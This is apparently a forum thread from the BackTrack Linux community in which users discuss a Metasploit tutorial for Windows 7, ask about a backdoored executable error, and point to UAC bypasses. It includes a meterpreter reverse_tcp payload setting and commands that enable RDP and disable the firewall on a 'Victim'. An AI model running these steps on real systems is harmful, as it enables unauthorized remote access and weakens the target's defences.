I was able to make a script only demo of UAC workaround
http://www.backtrack-linux.org/forum...s-control.html
I was able to make a script only demo of UAC workaround
http://www.backtrack-linux.org/forum...s-control.html
I'm surprised that so many people attempt to use metasploit over the internet, and do not know that they need to set up port forwarding, or do not know how. It really pays to have this knowledge first, as using metasploit over the internet is already questionable enough as it is, and our moderators may view this as potentially illegal activity. Not meaning any offense, just something for people to keep in mind.
when i'm trying to make the backdoored .exe I get this message
what's the matter? I've installed/uninstalled metasploit 10 times :/Code:./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES) from ./lib/rex/logging/sinks/flatfile.rb:20:in `new' from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize' from ./lib/msf/base/logging.rb:23:in `new' from ./lib/msf/base/logging.rb:23:in `init' from ./lib/msf/base/simple/framework.rb:100:in `simplify' from ./lib/msf/base/simple/framework.rb:71:in `create' from ./msfpayload:40 ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES) from ./lib/rex/logging/sinks/flatfile.rb:20:in `new' from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize' from ./lib/msf/base/logging.rb:23:in `new' from ./lib/msf/base/logging.rb:23:in `init' from ./lib/msf/base/simple/framework.rb:100:in `simplify' from ./lib/msf/base/simple/framework.rb:71:in `create' from ./msfencode:207
Thank you for the information.
In order to use this on windows7 you need to specify the payload to be 64x bit.
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Also most of the people will have hard time connecting to Win7 due to UAC priviledges.
Although there is cool script to bypass the uac.
check this site:
http://www.secmaniac.com/december-20...s-windows-uac/
Depends. A number of the payloads do, as long as you get the CPU architecture right. Most of the payloads are essentially shellcode, and as long as that shellcode uses Windows functions available in Windows 7, doesn't run afoul of any new privilege restricting features and also uses a compatible method for finding the address of kernel32 it should work fine on Windows 7. If you check the asm source (also here and here) for some of these payloads you will actually see that some of them make specific reference to Windows 7.
Exploits for third party apps that work on Windows XP may also work on Windows 7. Older exploits for Operating Systems components in Windows XP that have since been patched probably wont work on Windows 7.
Only if you are using a 64 bit version of Windows 7...
Last edited by lupin; 01-07-2011 at 01:51 AM.
Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".
The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
Just a question from a n00b but shouldn't:{Prepare for RDP}
Code:
shell
# Connect to CMD
reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections
reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections
Netsh firewall set opmode enable
# Enable Firewall on Victim
Netsh firewall set opmode disable
# Disable Firewall on Victim
be before"# Disables blocking incoming Terminal service connections"
If not why? Wouldn't you want to disable the "blocking" before "allowing" the incoming?"# Allows incoming terminal service connections" ?
I'm not critisizing at all just curious of what the best way should be.
Thanks!
nice tutorial!
does this work on xp too?